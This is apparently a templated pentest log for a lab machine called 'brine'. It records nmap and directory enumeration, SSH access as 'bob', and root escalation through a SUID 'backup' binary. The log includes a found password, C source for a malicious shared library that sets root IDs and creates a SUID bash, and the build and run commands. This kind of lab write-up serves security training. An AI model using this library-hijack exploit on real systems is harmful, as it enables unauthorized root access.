🧪 Pentest Log: {{date:2025-08-01}}

🔍 Target Information

• Machine Name: brine
• IP Address: 192.168.230.98
• Operating System: Linux

ip=192.168.230.98

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

ssh bob@$ip

Port 80

80/tcp open  http    Apache httpd 2.4.58
| http-git: 
|   192.168.230.98:80/.git/
|     Git repository found!
|     .git/config matched patterns 'user'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Removed comments 
| http-title: Grocery List
|_Requested resource was /brine/login
|_http-server-header: Apache/2.4.58 (Ubuntu)

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip/brine -r -o dirsearch.txt

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 22
• Vulnerability Type: N/A

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

N/A

🧬 Privilege Escalation

👤 Current Access

• User: bob
• Groups: bob
• Shell Type: ssh

🔍 Enumeration

SUID:

ls -al ./backup

found

-rwsr-xr-x 1 root root 14472 Feb 17 15:28 ./backup

strings ./backup

found password and a shared library

B4cup32M4n4age

./lib_backup.so

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: SUID
• Target Binary/Service: backup
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

vim exploit.c

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash .");
    system("chmod +s ./bash");
}

gcc -shared -fPIC -nostartfiles -o lib_backup.so exploit.c

• Smash to root

./backup

B4cup32M4n4age

3

exit

./bash -p